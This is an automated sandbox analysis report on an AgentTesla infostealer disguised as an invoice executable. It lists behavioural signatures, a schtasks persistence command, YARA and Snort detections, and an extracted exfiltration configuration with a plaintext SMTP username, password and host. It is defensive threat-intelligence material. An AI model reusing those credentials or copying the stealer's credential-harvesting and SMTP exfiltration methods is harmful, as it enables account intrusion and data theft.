Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICE OUTSTANDING.exe

Overview

General Information

Sample Name:INVOICE OUTSTANDING.exe
Analysis ID:680571
MD5:0fa9d94d6393235f67a17b220902dbfa
SHA1:3c0ae56ab072f622da13806b4336f01f7137ee4c
SHA256:65ea111f533e1283b202b87434ea207410c1680eadc9b2193c76179eb87decfc
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
.NET source code contains very large strings
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • INVOICE OUTSTANDING.exe (PID: 5128 cmdline: "C:\Users\user\Desktop\INVOICE OUTSTANDING.exe" MD5: 0FA9D94D6393235F67A17B220902DBFA)
    • BackgroundTransferHost.exe (PID: 5816 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
    • schtasks.exe (PID: 5816 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 5364 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • kECjS.exe (PID: 5912 cmdline: "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kECjS.exe (PID: 2756 cmdline: "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "import@oceanskylogistics.in", "Password": "OcE@n@123$", "Host": "mail.oceanskylogistics.in"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x97da1:$a13: get_DnsResolver
      • 0xcbbc1:$a13: get_DnsResolver
      • 0x965eb:$a20: get_LastAccessed
      • 0xca40b:$a20: get_LastAccessed
      • 0x98734:$a27: set_InternalServerPort
      • 0xcc554:$a27: set_InternalServerPort
      • 0x98a51:$a30: set_GuidMasterKey
      • 0xcc871:$a30: set_GuidMasterKey
      • 0x966f2:$a33: get_Clipboard
      • 0xca512:$a33: get_Clipboard
      • 0x96700:$a34: get_Keyboard
      • 0xca520:$a34: get_Keyboard
      • 0x979a7:$a35: get_ShiftKeyDown
      • 0xcb7c7:$a35: get_ShiftKeyDown
      • 0x979b8:$a36: get_AltKeyDown
      • 0xcb7d8:$a36: get_AltKeyDown
      • 0x9670d:$a37: get_Password
      • 0xca52d:$a37: get_Password
      • 0x9717d:$a38: get_PasswordHash
      • 0xcaf9d:$a38: get_PasswordHash
      • 0x981ac:$a39: get_DefaultCredentials
      00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AgentTesla_e577e17eunknownunknown
      • 0x70445:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
      • 0xa4265:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
      0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        14.0.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          14.0.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            14.0.RegSvcs.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
            • 0x324f0:$s10: logins
            • 0x31f4c:$s11: credential
            • 0x2e54a:$g1: get_Clipboard
            • 0x2e558:$g2: get_Keyboard
            • 0x2e565:$g3: get_Password
            • 0x2f7ef:$g4: get_CtrlKeyDown
            • 0x2f7ff:$g5: get_ShiftKeyDown
            • 0x2f810:$g6: get_AltKeyDown
            14.0.RegSvcs.exe.400000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
            • 0x2fbf9:$a13: get_DnsResolver
            • 0x2e443:$a20: get_LastAccessed
            • 0x3058c:$a27: set_InternalServerPort
            • 0x308a9:$a30: set_GuidMasterKey
            • 0x2e54a:$a33: get_Clipboard
            • 0x2e558:$a34: get_Keyboard
            • 0x2f7ff:$a35: get_ShiftKeyDown
            • 0x2f810:$a36: get_AltKeyDown
            • 0x2e565:$a37: get_Password
            • 0x2efd5:$a38: get_PasswordHash
            • 0x30004:$a39: get_DefaultCredentials
            14.0.RegSvcs.exe.400000.0.unpackWindows_Trojan_AgentTesla_e577e17eunknownunknown
            • 0x829d:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
            Click to see the 10 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.343.255.154.57497635872839723 08/08/22-20:20:11.732977
            SID:2839723
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.343.255.154.57497635872851779 08/08/22-20:20:11.733160
            SID:2851779
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.343.255.154.57497635872840032 08/08/22-20:20:11.733160
            SID:2840032
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.343.255.154.57497635872030171 08/08/22-20:20:11.732977
            SID:2030171
            Source Port:49763
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: INVOICE OUTSTANDING.exeReversingLabs: Detection: 37%
            Antivirus / Scanner detection for submitted sample
            Source: INVOICE OUTSTANDING.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exeAvira: detection malicious, Label: HEUR/AGEN.1235476
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exeReversingLabs: Detection: 37%
            Machine Learning detection for sample
            Source: INVOICE OUTSTANDING.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exeJoe Sandbox ML: detected
            Source: 14.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "import@oceanskylogistics.in", "Password": "OcE@n@123$", "Host": "mail.oceanskylogistics.in"}
            Source: INVOICE OUTSTANDING.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: INVOICE OUTSTANDING.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.551379171.00000000067DD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000003.378901648.00000000067E7000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49763 -> 43.255.154.57:587
            Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49763 -> 43.255.154.57:587
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49763 -> 43.255.154.57:587
            Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49763 -> 43.255.154.57:587
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: Joe Sandbox ViewIP Address: 43.255.154.57 43.255.154.57
            Source: global trafficTCP traffic: 192.168.2.3:49763 -> 43.255.154.57:587
            Source: global trafficTCP traffic: 192.168.2.3:49763 -> 43.255.154.57:587
            Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: RegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.oceanskylogistics.in
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wITvjB.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.275083576.0000000005DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comand
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.C
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.268824829.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268851153.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268730021.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268758763.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268943050.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlM
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.267043053.0000000005D98000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/pC
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comaCC
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalicCC
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsd
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom/pC
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.come.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comessed
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comueed
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258155841.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comic
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258239730.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comn
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comn-u
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261782172.0000000005D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cr%X
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnl
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnl-s
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnr-f
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.273884816.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274960497.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.275003587.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microft.c
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.K
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258362405.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258530065.0000000005DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258048117.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257978730.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257944160.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258298723.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258070392.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comdif
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kre
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258983594.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258921299.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comlic
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: RegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://Vvf6edm0NHgn8Mct.com
            Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: mail.oceanskylogistics.in

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Modifies the hosts file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
